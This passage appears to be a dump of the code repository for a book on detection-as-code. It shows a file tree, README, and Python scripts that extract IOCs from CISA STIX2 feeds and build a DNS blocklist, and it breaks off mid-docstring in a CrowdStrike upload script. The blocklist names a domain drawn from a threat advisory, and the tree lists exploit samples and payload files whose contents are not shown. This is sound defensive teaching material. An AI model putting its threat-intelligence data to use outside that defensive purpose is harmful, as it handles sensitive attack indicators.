├── LICENSE
├── README.md
├── chapter-01
└── CH01-Diagrams.pdf
├── chapter-02
├── lab-2.1
│ ├── cisa-stix2json-ioc-extract.py
│ ├── lab-2.1-initialoutput.png
│ ├── requirements.txt
│ ├── snatchransomware.json
│ └── svrjetbrains.json
├── lab-2.2
│ ├── c2_domain_feed.txt
│ ├── cisa-stix2json-ioc-extract.py
│ ├── cisa_domain_dnsbl.txt
│ ├── pfsense-custom-cisa-feed.py
│ ├── pfsense-dnsrbl-serve.py
│ ├── pfsense-pfblockerNG-DNSBL-config.png
│ ├── python-browser-access-text-file.png
│ ├── python-flash-runnning-terminal.png
│ ├── python-flask-windows-module-requirement.png
│ └── requirements.txt
├── lab-2.3
│ └── SHA-HASH-FEED.txt
├── lab-2.4
│ ├── custom-ioc-crowdstrike.py
│ └── requirements.txt
└── lab-2.5
│ ├── ag_ioc_sha256_hash_vt_basic.yar.yml
│ └── rule_multiple_connections_ru_cti.yar.yml
├── chapter-03
├── lab-3.2
│ ├── custom-ioa-cs.py
│ ├── get-ioa-cs.py
│ ├── requirements.txt
│ └── test-rule-import.json
├── lab-3.3
│ ├── local-tf-repo
│ │ ├── LICENSE
│ │ ├── README.md
│ │ └── main.tf
│ └── wiz-threat-rule-example.tf
├── lab-3.4
│ ├── aws-iam-cloud-custodian-deploy-lambda-policy.json
│ ├── aws-iam-cloud-custodian-s3-lambdas-policy.json
│ ├── cfn-configure-aws-credentials-latest.yml
│ ├── custodian-s3-policy.yml
│ ├── deploy-to-aws-cloud-custodian.yml
│ ├── oidc-trust-aws.json
│ └── sample-policy.yml
├── lab-3.5
│ ├── aws-lambda-sample-rce-payload.json
│ ├── example-custom-rasp-rule.json
│ ├── insecure_lamda_example.py
│ ├── requirements.txt
│ ├── trend-rasp-custom-rule-ci.py
│ ├── trend_cloudone_appsec_api_swagger.json
│ └── trendmicro-cloud-one-rasp.yml
└── lab-3.6
│ ├── github-action-terraform-s3backed.yml
│ ├── iam-policy-github-tfstate-s3.json
│ ├── main.tf
│ └── rule-Log4j_Scanner_detected_in_user_agent_or_referrer.json
├── chapter-04
├── lab-4.1
│ └── poe-bot-prompt-context.txt
└── lab-4.3
│ ├── ai-recommended-spl.txt
│ ├── de-feed-url-grab.py
│ ├── de-poe-bot-spl-example-outputs.txt
│ ├── de-poe-bot-spl.py
│ ├── de-rssparse-generate-spl-example-output.txt
│ ├── de-rssparse-generate-spl.py
│ └── requirements.txt
├── chapter-05
├── lab-5.1
│ ├── cs-falcon-us-2-swagger-beautified.json
│ ├── cs-falcon-us-2-swagger-openapi-spec.json
│ ├── custom-ioa-cs.py
│ ├── get-ioa-cs.py
│ ├── github-action-deploy-customioa.yml
│ ├── helloWorld-sysargv-example.py
│ ├── linter-custom-ioa.py
│ ├── requirements.txt
│ └── test-rule-import.json
├── lab-5.2
│ ├── WannaCry Malware Profile _ Mandiant.pdf
│ ├── chron-yara-rule-payload-check.py
│ ├── chron-yara-rule-testspec-ci.py
│ ├── chron-yara-unittest.yml
│ ├── requirements.txt
│ ├── tests
│ │ ├── chron-yara-rule-testspec-ci.py
│ │ └── testspec.txt
│ └── wannacry_killswitch_domain.yaral
├── lab-5.3
│ ├── rules
│ │ └── ms08-067-snort.rule
│ └── snort2panos-test.py
├── lab-5.4
│ ├── bash-testing
│ │ ├── test-suricata-unittest-rules.sh
│ │ └── test2-suricata-unittest-rules.sh
│ ├── buildspec.csv
│ ├── emerging-exploit.rules
│ ├── rules
│ │ └── test-exploit-zerologon.rules
│ ├── suricata-config.yml
│ ├── suricata-rule-test-ci.py
│ ├── suricata-unit-test-ci.yml
│ └── tests
│ │ ├── Exfiltration-DNS-CreditCard-903.pcap
│ │ ├── Exfiltration-DNS-Sourcecode-903.pcap
│ │ ├── Infiltration-CVE-2016-4117-1329.pcap
│ │ ├── Lateral-Movement-CVE-2023-21716-exploit.pcap
│ │ ├── Lateral-Movement-Sabbath-ransomware.pcap
│ │ └── cve-2020-1472-exploit.pcap
└── lab-5.5
│ ├── bad-code.sh
│ ├── instructions.txt
│ └── pre-commit
├── chapter-06
├── lab-6.1
│ ├── audit-example-log.txt
│ ├── buildspec.txt
│ ├── spl-integration-test.sh
│ ├── spl-test-exp-backoff.sh
│ ├── splunk cli cmds.txt
│ ├── splunk debian download.txt
│ ├── splunk-first-start-shell-session.txt
│ ├── splunk-spl-int-test.yml
│ ├── start-github-action-runner.sh
│ └── tests
│ │ └── audit-example-log.txt
├── lab-6.2
│ ├── cloudwatch-metrics-cli-query.txt
│ ├── createAccessKeyPolicyCI.json
│ ├── iam-access-key-generated-rule-CloudFormation-Template.yaml
│ ├── main.tf
│ ├── requirements.txt
│ └── tests
│ │ ├── github-action-eventbridge-integration-testing.yml
│ │ ├── test-iam-access-key-generated-rule.py
│ │ ├── testing.py
│ │ └── validate-iam-access-key-generated-rule.py
├── lab-6.3
│ ├── BASE-get-detections-host-cs copy.py
│ ├── Cloud IP Addresses and FQDNs _ Sensor Deployment and Maintenance _ Documentation _ Support and resources _ Falcon.pdf
│ ├── Deploy Falcon Sensor for Linux Using CLI _ Deploy Falcon Sensor for Linux _ Falcon Sensor for Linux _ Linux, Kubernetes, and Cloud _ Sensor Deployment and Maintenance _ Documentation _ Support and resources _ Falcon.pdf
│ ├── Sensor Update Policies _ Sensor Deployment and Maintenance _ Documentation _ Support and resources _ Falcon.pdf
│ ├── cs-falcon-us-2-swagger-beautified.json
│ ├── cs-falcon-us-2-swagger-openapi-spec.json
│ ├── custom-ioa-cs.py
│ ├── detections-example-output-build-ci.txt
│ ├── example-detections-found-output.json
│ ├── falcon-detection-testing.yml
│ ├── get-ioa-cs.py
│ ├── linter-custom-ioa.py
│ ├── requirements.txt
│ ├── test-detections-host-cs.py
│ └── test-rule-import.json
├── lab-6.4
│ └── start-caledera.sh
└── optional-resources
│ └── bas-tools
│ └── safebreach-get-test-results.py
├── chapter-07
├── lab-7.1
│ ├── ai-unit-testing-prompt-claude2.txt
│ ├── bot-kb
│ │ └── links-to-pdfs.md
│ ├── buildspec.csv
│ ├── ci-spl-tester-poe.py
│ ├── detections
│ │ └── aws-iam-access-key-creation.spl
│ ├── local-spl-tester-poe.py
│ ├── logs
│ │ └── aws-iam-access-key-creation.log
│ ├── prompt.md
│ ├── requirements.txt
│ └── splunk-spl-ai-tester-ci.yml
└── lab-7.2
│ └── linter-custom-ioa.py
├── chapter-08
├── lab-8.1
│ ├── Data Ingestion and Health 2024-01-25T1419.pdf
│ ├── Rule Detections 2024-01-25T1416.pdf
│ └── Rule Detections.yaml
└── lab-8.2
│ ├── chronicle-alerts.json
│ ├── chronicle-listrules.json
│ └── tines-count-google-chronicle-alerts-and-disable-noisy-rules.json
├── chapter-09
├── lab-9.1
│ └── atlassian_jql-cheat-sheet.pdf
└── references
│ └── Beyond-the-basics-of-scaling-agile-white-paper.pdf
└── chapter-10
├── diagrams
├── L1-WorkflowPattern.png
├── L2-WorkflowPattern.png
└── L3-WorkfowPattern.png
└── lab-10.1
└── splunk_spl_dev.ipynb
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2023 Packt
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Automating Security Detection Engineering
2 |
3 |
4 |
5 | This is the code repository for [Automating Security Detection Engineering](https://www.packtpub.com/product/automating-security-detection-engineering/9781837636419?utm_source=github&utm_medium=repository&utm_campaign=9781837636419), published by Packt.
6 |
7 | **A hands-on guide to implementing Detection as Code**
8 |
9 | ## What is this book about?
10 | This book focuses entirely on the automation of detection engineering with practice labs, and technical guidance that optimizes and scales detection focused programs. Using this book as a bootstrap, practitioners can mature their program and free up valuable engineering time.
11 |
12 | This book covers the following exciting features:
13 | * Understand the architecture of Detection as Code implementations
14 | * Develop custom test functions using Python and Terraform
15 | * Leverage common tools like GitHub and Python 3.x to create detection-focused CI/CD pipelines
16 | * Integrate cutting-edge technology and operational patterns to further refine program efficacy
17 | * Apply monitoring techniques to continuously assess use case health
18 | * Create, structure, and commit detections to a code repository
19 |
20 | If you feel this book is for you, get your [copy](https://www.amazon.com/dp/1837636419) today!
21 |
22 |
24 |
25 | ## Instructions and Navigations
26 | All of the code is organized into folders. For example, Chapter02.
27 |
28 | The code will look like the following:
29 | ```
30 | if {
31 | event1 == True,
32 | {
33 | event2 == True,
34 | {
35 | event3
36 | }
37 | }
38 | }
39 | ```
40 |
41 | **Following is what you need for this book:**
42 | This book is for security engineers and analysts responsible for the day-to-day tasks of developing and implementing new detections at scale. If you’re working with existing programs focused on threat detection, you’ll also find this book helpful. Prior knowledge of DevSecOps, hands-on experience with any programming or scripting languages, and familiarity with common security practices and tools are recommended for an optimal learning experience.
43 |
44 | With the following software and hardware list you can run all code files present in the book (Chapter 1-10).
45 | ### Software and Hardware List
46 | | Chapter | Software required | OS required |
47 | | -------- | ------------------------------------ | ----------------------------------- |
48 | | 1-10 | A computer capable of running an Ubuntu-based VM concurrently, with a recommended 8 CPU cores and 16 GB of memory for the host machine| Windows, Mac OS X, and Linux (Any) |
49 | | 1-10 | Amazon Web Services (AWS) | Windows, Mac OS X, and Linux (Any) |
50 | | 1-10 | Atlassian Jira Cloud | Windows, Mac OS X, and Linux (Any) |
51 | | 1-10 | Cloud Custodian | Windows, Mac OS X, and Linux (Any) |
52 | | 1-10 | Cloudflare WAF | Windows, Mac OS X, and Linux (Any) |
53 | | 1-10 | CodeRabbit AI | Windows, Mac OS X, and Linux (Any) |
54 | | 1-10 | CrowdStrike Falcon EDR | Windows, Mac OS X, and Linux (Any) |
55 | | 1-10 | Datadog Cloud SIEM | Windows, Mac OS X, and Linux (Any) |
56 | | 1-10 | Git CLI | Windows, Mac OS X, and Linux (Any) |
57 | | 1-10 | GitHub | Windows, Mac OS X, and Linux (Any) |
58 | | 1-10 | Google Chronicle | Windows, Mac OS X, and Linux (Any) |
59 | | 1-10 | Google Colab | Windows, Mac OS X, and Linux (Any) |
60 | | 1-10 | Hashicorp Terraform | Windows, Mac OS X, and Linux (Any) |
61 | | 1-10 | Microsoft VS Code | Windows, Mac OS X, and Linux (Any) |
62 | | 1-10 | PFSense Community Edition | Windows, Mac OS X, and Linux (Any) |
63 | | 1-10 | Poe.com AI | Windows, Mac OS X, and Linux (Any) |
64 | | 1-10 | Python 3.9+ | Windows, Mac OS X, and Linux (Any) |
65 | | 1-10 | SOC Prime Uncoder AI | Windows, Mac OS X, and Linux (Any) |
66 | | 1-10 | Splunk Enterprise | Windows, Mac OS X, and Linux (Any) |
67 | | 1-10 | Tines.com Cloud SOAR | Windows, Mac OS X, and Linux (Any) |
68 | | 1-10 | Trend Micro Cloud One | Windows, Mac OS X, and Linux (Any) |
69 | | 1-10 | Ubuntu Desktop LTS 22.04+ | Windows, Mac OS X, and Linux (Any) |
70 | | 1-10 | Wazuh Server and EDR | Windows, Mac OS X, and Linux (Any) |
71 |
72 | ### Related products
73 | * Security Monitoring with Wazuh [[Packt]](https://www.packtpub.com/product/security-monitoring-with-wazuh/9781837632152?utm_source=github&utm_medium=repository&utm_campaign=9781837632152) [[Amazon]](https://www.amazon.com/dp/1837632154)
74 |
75 | * Practical Threat Detection Engineering [[Packt]](https://www.packtpub.com/product/practical-threat-detection-engineering/9781801076715?utm_source=github&utm_medium=repository&utm_campaign=9781801076715) [[Amazon]](https://www.amazon.com/dp/1801076715)
76 |
77 |
78 | ## Get to Know the Author
79 | **Dennis Chow**
80 | is an experienced security engineer and manager who has led global security teams in multiple Fortune 500 industries. Dennis started from an IT and security analyst background, working his way up to engineering, architecture, and consultancy in blue and red team focused roles. Dennis is also a former AWS professional services consultant who focused on transforming security operations for clients.
81 |
82 |
--------------------------------------------------------------------------------
/chapter-01/CH01-Diagrams.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-01/CH01-Diagrams.pdf
--------------------------------------------------------------------------------
/chapter-02/lab-2.1/cisa-stix2json-ioc-extract.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import requests, json, re, argparse
3 |
4 |
5 | #cisa_feed = requests.get("https://www.cisa.gov/sites/default/files/2023-09/AA23-263A%20%23StopRansomware%20Snatch%20Ransomware.stix_.json")
6 | #cisa_feed = requests.get("https://www.cisa.gov/sites/default/files/2023-12/aa23-347a-russian-foreign-intelligence-service-svr-exploiting-jetbrains-teamcity-cve-globally.json")
7 |
8 | #print(type(cisa_feed.json()))
9 | #json_payload = cisa_feed.json()
10 |
def parse_iocs(json_payload):
    """Parse atomic IOCs out of a CISA STIX2 JSON payload.

    Walks every STIX object of type ``indicator`` and applies regexes to its
    ``pattern`` expression to extract individual indicator values.

    Args:
        json_payload: dict decoded from a CISA STIX2 JSON feed; must contain
            a top-level ``objects`` list of STIX objects.

    Returns:
        dict mapping the keys ``domains``, ``emails``, ``filenames``,
        ``ipv4``, ``md5``, ``sha256`` and ``urls`` to lists of strings.
    """
    iocs = {
        "domains": [],
        "emails": [],
        "filenames": [],
        "ipv4": [],
        "md5": [],
        "sha256": [],
        "urls": [],
    }
    for obj in json_payload["objects"]:
        if obj.get("type") != "indicator":
            continue
        pattern = obj.get("pattern")
        if pattern is None:
            # Some indicator objects carry no pattern; skip them quietly
            # (the original swallowed the KeyError the same way).
            continue
        # All regexes below are raw strings; the original plain strings used
        # invalid escape sequences such as "\S" and "\d", which raise
        # SyntaxWarning on Python 3.12+.
        if 'email-message:' in pattern:
            email_match = re.search(r"\.value = '(\S{1,100}@\S{1,100}\.\S{1,6})']", pattern)
            if email_match:
                # \S can over-capture the closing quote/bracket; trim them.
                iocs["emails"].append(email_match.group(1).strip("']"))
        if "file:name" in pattern:
            filename_match = re.search(r"file:name = '(\S{1,20})'", pattern)
            if filename_match:
                iocs["filenames"].append(filename_match.group(1))
        if "SHA-256" in pattern:
            sha256_match = re.search(r"'SHA-256' = '([A-Fa-f0-9]{64})'", pattern)
            if sha256_match:
                iocs["sha256"].append(sha256_match.group(1))
        if "MD5" in pattern:
            md5_match = re.search(r"MD5 = '([A-Fa-f0-9]{32})'", pattern)
            if md5_match:
                iocs["md5"].append(md5_match.group(1))
        if "domain-name" in pattern:
            domain_match = re.search(r"value = '(\S{3,255})'", pattern)
            if domain_match:
                iocs["domains"].append(domain_match.group(1))
        if "ipv4-addr" in pattern:
            ipv4_match = re.search(r"value = '(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})'", pattern)
            if ipv4_match:
                iocs["ipv4"].append(ipv4_match.group(1))
        if "url:value" in pattern:
            url_match = re.search(r"value = '(\S{6,500})'", pattern)
            if url_match:
                iocs["urls"].append(url_match.group(1))
    return iocs


def ioc_extract(url_arg):
    """Download a CISA STIX2 JSON feed and print each parsed IOC list.

    Args:
        url_arg: URL of a CISA STIX2 JSON formatted advisory feed.
    """
    cisa_feed = requests.get(url_arg, timeout=30)
    # Fail loudly on HTTP errors instead of trying to parse an error page.
    cisa_feed.raise_for_status()
    iocs = parse_iocs(cisa_feed.json())
    # standard out #
    for label, key in (
        ('FQDN', 'domains'),
        ('EMAILS', 'emails'),
        ('FILENAMES', 'filenames'),
        ('IPv4', 'ipv4'),
        ('SHA256', 'sha256'),
        ('MD5', 'md5'),
        ('URL', 'urls'),
    ):
        print('### %s PARSED ###' % label)
        print(iocs[key])

### Dunder statement main driver ###
if __name__ == '__main__':
    parser = argparse.ArgumentParser(
        prog='cisa-stix2json-ioc-extract',
        description='Takes CISA STIX2 JSON formatted feeds and parses IOCs',
        epilog='Usage: python3 cisa-stix2json-ioc-extract.py -url "https://cisa.gov/foo/something.json"'
    )
    # required=True: the original accepted a missing -url and then crashed
    # inside requests.get(None) with a confusing exception instead of a
    # clear usage message.
    parser.add_argument('-url', type=str, required=True, help='use stix2json formatted url')
    args = parser.parse_args()
    # call ioc extractor func
    ioc_extract(args.url)
--------------------------------------------------------------------------------
/chapter-02/lab-2.1/lab-2.1-initialoutput.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-02/lab-2.1/lab-2.1-initialoutput.png
--------------------------------------------------------------------------------
/chapter-02/lab-2.1/requirements.txt:
--------------------------------------------------------------------------------
1 | altgraph @ file:///AppleInternal/Library/BuildRoots/9dd5efe2-7fad-11ee-b588-aa530c46a9ea/Library/Caches/com.apple.xbs/Sources/python3/altgraph-0.17.2-py2.py3-none-any.whl
2 | certifi==2023.11.17
3 | charset-normalizer==3.3.2
4 | crowdstrike-falconpy==1.3.4
5 | future @ file:///AppleInternal/Library/BuildRoots/9dd5efe2-7fad-11ee-b588-aa530c46a9ea/Library/Caches/com.apple.xbs/Sources/python3/future-0.18.2-py3-none-any.whl
6 | idna==3.6
7 | macholib @ file:///AppleInternal/Library/BuildRoots/9dd5efe2-7fad-11ee-b588-aa530c46a9ea/Library/Caches/com.apple.xbs/Sources/python3/macholib-1.15.2-py2.py3-none-any.whl
8 | requests==2.31.0
9 | six @ file:///AppleInternal/Library/BuildRoots/9dd5efe2-7fad-11ee-b588-aa530c46a9ea/Library/Caches/com.apple.xbs/Sources/python3/six-1.15.0-py2.py3-none-any.whl
10 | urllib3==2.1.0
11 |
--------------------------------------------------------------------------------
/chapter-02/lab-2.2/cisa-stix2json-ioc-extract.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import requests, json, re, argparse
3 |
4 |
5 | #cisa_feed = requests.get("https://www.cisa.gov/sites/default/files/2023-09/AA23-263A%20%23StopRansomware%20Snatch%20Ransomware.stix_.json")
6 | #cisa_feed = requests.get("https://www.cisa.gov/sites/default/files/2023-12/aa23-347a-russian-foreign-intelligence-service-svr-exploiting-jetbrains-teamcity-cve-globally.json")
7 |
8 | #print(type(cisa_feed.json()))
9 | #json_payload = cisa_feed.json()
10 |
def parse_iocs(json_payload):
    """Parse atomic IOCs out of a CISA STIX2 JSON payload.

    Walks every STIX object of type ``indicator`` and applies regexes to its
    ``pattern`` expression to extract individual indicator values.

    Args:
        json_payload: dict decoded from a CISA STIX2 JSON feed; must contain
            a top-level ``objects`` list of STIX objects.

    Returns:
        dict mapping the keys ``domains``, ``emails``, ``filenames``,
        ``ipv4``, ``md5``, ``sha256`` and ``urls`` to lists of strings.
    """
    iocs = {
        "domains": [],
        "emails": [],
        "filenames": [],
        "ipv4": [],
        "md5": [],
        "sha256": [],
        "urls": [],
    }
    for obj in json_payload["objects"]:
        if obj.get("type") != "indicator":
            continue
        pattern = obj.get("pattern")
        if pattern is None:
            # Some indicator objects carry no pattern; skip them quietly
            # (the original swallowed the KeyError the same way).
            continue
        # All regexes below are raw strings; the original plain strings used
        # invalid escape sequences such as "\S" and "\d", which raise
        # SyntaxWarning on Python 3.12+.
        if 'email-message:' in pattern:
            email_match = re.search(r"\.value = '(\S{1,100}@\S{1,100}\.\S{1,6})']", pattern)
            if email_match:
                # \S can over-capture the closing quote/bracket; trim them.
                iocs["emails"].append(email_match.group(1).strip("']"))
        if "file:name" in pattern:
            filename_match = re.search(r"file:name = '(\S{1,20})'", pattern)
            if filename_match:
                iocs["filenames"].append(filename_match.group(1))
        if "SHA-256" in pattern:
            sha256_match = re.search(r"'SHA-256' = '([A-Fa-f0-9]{64})'", pattern)
            if sha256_match:
                iocs["sha256"].append(sha256_match.group(1))
        if "MD5" in pattern:
            md5_match = re.search(r"MD5 = '([A-Fa-f0-9]{32})'", pattern)
            if md5_match:
                iocs["md5"].append(md5_match.group(1))
        if "domain-name" in pattern:
            domain_match = re.search(r"value = '(\S{3,255})'", pattern)
            if domain_match:
                iocs["domains"].append(domain_match.group(1))
        if "ipv4-addr" in pattern:
            ipv4_match = re.search(r"value = '(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})'", pattern)
            if ipv4_match:
                iocs["ipv4"].append(ipv4_match.group(1))
        if "url:value" in pattern:
            url_match = re.search(r"value = '(\S{6,500})'", pattern)
            if url_match:
                iocs["urls"].append(url_match.group(1))
    return iocs


def ioc_extract(url_arg):
    """Download a CISA STIX2 JSON feed and print each parsed IOC list.

    Args:
        url_arg: URL of a CISA STIX2 JSON formatted advisory feed.
    """
    cisa_feed = requests.get(url_arg, timeout=30)
    # Fail loudly on HTTP errors instead of trying to parse an error page.
    cisa_feed.raise_for_status()
    iocs = parse_iocs(cisa_feed.json())
    # standard out #
    for label, key in (
        ('FQDN', 'domains'),
        ('EMAILS', 'emails'),
        ('FILENAMES', 'filenames'),
        ('IPv4', 'ipv4'),
        ('SHA256', 'sha256'),
        ('MD5', 'md5'),
        ('URL', 'urls'),
    ):
        print('### %s PARSED ###' % label)
        print(iocs[key])

### Dunder statement main driver ###
if __name__ == '__main__':
    parser = argparse.ArgumentParser(
        prog='cisa-stix2json-ioc-extract',
        description='Takes CISA STIX2 JSON formatted feeds and parses IOCs',
        epilog='Usage: python3 cisa-stix2json-ioc-extract.py -url "https://cisa.gov/foo/something.json"'
    )
    # required=True: the original accepted a missing -url and then crashed
    # inside requests.get(None) with a confusing exception instead of a
    # clear usage message.
    parser.add_argument('-url', type=str, required=True, help='use stix2json formatted url')
    args = parser.parse_args()
    # call ioc extractor func
    ioc_extract(args.url)
--------------------------------------------------------------------------------
/chapter-02/lab-2.2/cisa_domain_dnsbl.txt:
--------------------------------------------------------------------------------
1 | matclick.com
--------------------------------------------------------------------------------
/chapter-02/lab-2.2/pfsense-custom-cisa-feed.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import requests, json, re, argparse
3 |
4 |
5 | #cisa_feed = requests.get("https://www.cisa.gov/sites/default/files/2023-09/AA23-263A%20%23StopRansomware%20Snatch%20Ransomware.stix_.json")
6 | #cisa_feed = requests.get("https://www.cisa.gov/sites/default/files/2023-12/aa23-347a-russian-foreign-intelligence-service-svr-exploiting-jetbrains-teamcity-cve-globally.json")
7 |
8 | #print(type(cisa_feed.json()))
9 | #json_payload = cisa_feed.json()
10 |
def parse_iocs(json_payload):
    """Parse atomic IOCs out of a CISA STIX2 JSON payload.

    Args:
        json_payload: dict decoded from a CISA STIX2 JSON feed; must contain
            a top-level ``objects`` list of STIX objects.

    Returns:
        Tuple of six lists, in this order: (domain_list, email_list,
        filename_list, ipv4_list, sha256_list, url_list).
        NOTE: MD5 hashes are collected internally but — matching the
        original interface that callers index positionally — are not
        part of the returned tuple.
    """
    filename_list = []
    domain_list = []
    email_list = []
    ipv4_list = []
    md5_list = []
    sha256_list = []
    url_list = []

    for obj in json_payload["objects"]:
        if obj.get("type") != "indicator":
            continue
        pattern = obj.get("pattern")
        if pattern is None:
            # Indicator without a pattern; the original swallowed the
            # KeyError the same way.
            continue
        # Raw strings: the original plain-string regexes contained invalid
        # escape sequences ("\S", "\d", "\.") that raise SyntaxWarning on
        # Python 3.12+.
        if 'email-message:' in pattern:
            email_match = re.search(r"\.value = '(\S{1,100}@\S{1,100}\.\S{1,6})']", pattern)
            if email_match:
                # \S can over-capture the closing quote/bracket; trim them.
                email_list.append(email_match.group(1).strip("']"))
        if "file:name" in pattern:
            filename_match = re.search(r"file:name = '(\S{1,20})'", pattern)
            if filename_match:
                filename_list.append(filename_match.group(1))
        if "SHA-256" in pattern:
            sha256_match = re.search(r"'SHA-256' = '([A-Fa-f0-9]{64})'", pattern)
            if sha256_match:
                sha256_list.append(sha256_match.group(1))
        if "MD5" in pattern:
            md5_match = re.search(r"MD5 = '([A-Fa-f0-9]{32})'", pattern)
            if md5_match:
                md5_list.append(md5_match.group(1))
        if "domain-name" in pattern:
            domain_match = re.search(r"value = '(\S{3,255})'", pattern)
            if domain_match:
                domain_list.append(domain_match.group(1))
        if "ipv4-addr" in pattern:
            ipv4_match = re.search(r"value = '(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})'", pattern)
            if ipv4_match:
                ipv4_list.append(ipv4_match.group(1))
        if "url:value" in pattern:
            url_match = re.search(r"value = '(\S{6,500})'", pattern)
            if url_match:
                url_list.append(url_match.group(1))
    return domain_list, email_list, filename_list, ipv4_list, sha256_list, url_list


def ioc_extract(url_arg):
    """Download a CISA STIX2 JSON feed and return the parsed IOC lists.

    Args:
        url_arg: URL of a CISA STIX2 JSON formatted advisory feed.

    Returns:
        Same six-element tuple as :func:`parse_iocs`.
    """
    cisa_feed = requests.get(url_arg, timeout=30)
    # Fail loudly on HTTP errors instead of trying to parse an error page.
    cisa_feed.raise_for_status()
    return parse_iocs(cisa_feed.json())

### Dunder statement main driver ###
if __name__ == '__main__':
    parser = argparse.ArgumentParser(
        prog='cisa-stix2json-ioc-extract',
        description='Takes CISA STIX2 JSON formatted feeds and parses IOCs',
        epilog='Usage: python3 cisa-stix2json-ioc-extract.py -url "https://cisa.gov/foo/something.json"'
    )
    # required=True: a missing -url previously crashed inside
    # requests.get(None) instead of printing a usage message.
    parser.add_argument('-url', type=str, required=True, help='use stix2json formatted url')
    args = parser.parse_args()

    # positional tuple grab domains_list from return
    domains = ioc_extract(args.url)[0]

    # BUG FIX: the original wrote every domain with no separator, producing
    # one concatenated line; pfBlockerNG DNSBL feeds require exactly one
    # domain per line (see cisa_domain_dnsbl.txt).  The context manager
    # also guarantees the buffer is flushed and the handle closed.
    with open('cisa_domain_dnsbl.txt', 'a') as file_handle:
        for domain in domains:
            file_handle.write(domain + '\n')


'''
python .\pfsense-custom-cisa-feed.py -url "https://www.cisa.gov/sites/default/files/2023-12/aa23-347a-russian-foreign-intelligence-service-svr-exploiting-jetbrains-teamcity-cve-globally.json"
'''
--------------------------------------------------------------------------------
/chapter-02/lab-2.2/pfsense-dnsrbl-serve.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
from flask import Flask, Response
app = Flask(__name__)

@app.route("/")
def servefile():
    """Serve the CISA DNSBL text file as plain text for pfBlockerNG.

    Returns:
        flask.Response with the file contents and a text/plain MIME type.
    """
    # Context manager ensures the handle is closed after every request;
    # the original opened the file per hit and never closed it, leaking
    # one file descriptor per request.
    with open('cisa_domain_dnsbl.txt', 'r') as handle:
        contents = handle.read()
    return Response(contents, mimetype="text/plain")

if __name__ == "__main__":
    # NOTE(review): binding port 443 requires elevated privileges, and the
    # 'adhoc' ssl_context generates a throwaway self-signed certificate
    # (needs the pyOpenSSL/cryptography extras installed).
    app.run(host='0.0.0.0', port=443, ssl_context='adhoc')
--------------------------------------------------------------------------------
/chapter-02/lab-2.2/pfsense-pfblockerNG-DNSBL-config.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-02/lab-2.2/pfsense-pfblockerNG-DNSBL-config.png
--------------------------------------------------------------------------------
/chapter-02/lab-2.2/python-browser-access-text-file.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-02/lab-2.2/python-browser-access-text-file.png
--------------------------------------------------------------------------------
/chapter-02/lab-2.2/python-flash-runnning-terminal.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-02/lab-2.2/python-flash-runnning-terminal.png
--------------------------------------------------------------------------------
/chapter-02/lab-2.2/python-flask-windows-module-requirement.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-02/lab-2.2/python-flask-windows-module-requirement.png
--------------------------------------------------------------------------------
/chapter-02/lab-2.2/requirements.txt:
--------------------------------------------------------------------------------
1 | certifi==2023.11.17
2 | charset-normalizer==3.3.2
3 | idna==3.6
4 | requests==2.31.0
5 | urllib3==2.1.0
6 |
--------------------------------------------------------------------------------
/chapter-02/lab-2.4/custom-ioc-crowdstrike.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | from falconpy import APIHarnessV2
3 | import argparse
4 |
5 | #Ref: https://www.falconpy.io/Usage/Basic-Uber-Class-usage.html#import-and-authentication
6 |
7 | #In a CI runner make these from the env variables at build time from a secrets manager!
8 | #CLIENT_ID=''
9 | #CLIENT_SECRET=''
10 |
def uploadioc(ioc_body, id, secret):
    """Submit a custom IOC payload to CrowdStrike Falcon.

    Uses the FalconPy Uber class (APIHarnessV2) to call the
    ``indicator_create_v1`` operation.

    Args:
        ioc_body: dict payload containing the ``indicators`` list to create.
        id: CrowdStrike Falcon API client ID.
        secret: CrowdStrike Falcon API client secret.

    Returns:
